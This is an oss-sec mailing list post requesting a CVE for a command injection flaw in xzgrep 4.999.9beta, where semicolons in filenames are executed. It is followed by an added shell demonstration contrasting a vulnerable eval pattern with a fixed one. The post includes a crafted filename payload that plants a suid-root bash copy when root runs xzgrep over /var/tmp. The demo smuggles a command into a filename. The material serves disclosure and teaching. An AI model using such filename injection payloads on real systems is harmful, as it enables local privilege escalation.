oss-sec mailing list archives
CVE request: xzgrep 4.999.9beta arbitrary code execution vulnerability
From: Bart Dopheide <dopheide () fmf nl>
Date: Mon, 18 May 2015 13:16:33 +0200
I discovered a bug in xzgrep 4.999.9beta. Please assign a CVE for this
vulnerability.

* Affected versions: 4.999.9beta
* Fixed versions: 5.0.0 and up, 5.2.0 and up
* Description: xzgrep 4.999.9beta processes filenames containing a
  semicolon incorrectly, which allows for arbitrary code execution as the
  local user running xzgrep.

Demonstration of the vulnerability:

sh-4.1$ touch /tmp/semi\;colon
sh-4.1$ xzgrep anystring /tmp/semi\;colon
xz: /tmp/semi: No such file or directory
/usr/bin/xzgrep: line 199: colon: command not found
sh-4.1$

xzgrep tries to extract/grep /tmp/semi and tries to execute "colon", which
is obviously not wanted.

With a specially crafted filename and three ounces of social engineering, a
local root exploit is possible. For example:

sh-4.1$ touch '/var/tmp/;echo -e "cp -p \0057bin\0057bash \0057var\0057tmp\0057\nchmod u+s \0057var\0057tmp\0057bash" > zzz;sh zzz;rm -f zzz'
sh-4.1# find /var/tmp -type f -exec xzgrep anystring {} \+

A suid root /var/tmp/bash should be the result.

I checked RHEL 6, CentOS 6: they run 4.999.9beta and they are vulnerable.

-- 
Bart Dopheide
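The following is an added example; it is not code from the report above or from the xz project. It models the class of bug the report describes: a wrapper script splices a filename unquoted into a command string and then eval's it, so a ';' in the name is parsed as a command separator, next to the fixed form that passes the name as a single quoted argument. The function names (vulnerable_grep, fixed_grep, probe), the use of cat in place of the decompressor, and the "touch marker" payload are assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original post or from xz. It reproduces the
# unquoted-filename-in-eval pattern next to its hardened counterpart.
# Function names and the marker-file payload are hypothetical.

# Vulnerable pattern: the pipeline is assembled as a string and eval'ed with
# the filename unquoted, so shell metacharacters in the name are executed.
# (cat stands in for the real decompressor invocation.)
vulnerable_grep() {
    _pat=$1
    _file=$2
    eval "cat -- $_file | grep -- $_pat"
}

# Fixed pattern: the filename is one quoted argument and is never re-parsed
# by the shell, so ';' is just a byte in the name.
fixed_grep() {
    _pat=$1
    _file=$2
    cat -- "$_file" | grep -- "$_pat"
}

# Runs one implementation on a constructed filename that carries a ';'
# payload and reports "executed" if the payload ran (a marker file
# appeared) or "safe" if it did not.
probe() {
    _impl=$1
    _dir=$(mktemp -d)
    _marker="$_dir/marker"
    # Constructed malicious filename: "<dir>/semi;touch <dir>/marker"
    _name="$_dir/semi;touch $_marker"
    # There is nothing to match, so grep exits nonzero either way.
    "$_impl" anystring "$_name" 2>/dev/null || true
    if [ -e "$_marker" ]; then
        _result=executed
    else
        _result=safe
    fi
    rm -rf "$_dir"
    printf '%s\n' "$_result"
}

# Same filename, both implementations: only the eval'ed one runs the payload.
main() {
    printf 'vulnerable: %s\n' "$(probe vulnerable_grep)"
    printf 'fixed:      %s\n' "$(probe fixed_grep)"
}

main
```

The point of the fixed form is not escaping the ';' but never handing the filename back to the shell parser at all; once a name is an argument rather than part of a string that gets eval'ed, no character in it can become syntax.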
Current thread:
- CVE request: xzgrep 4.999.9beta arbitrary code execution vulnerability Bart Dopheide (May 18)
- Re: CVE request: xzgrep 4.999.9beta arbitrary code execution vulnerability cve-assign (May 19)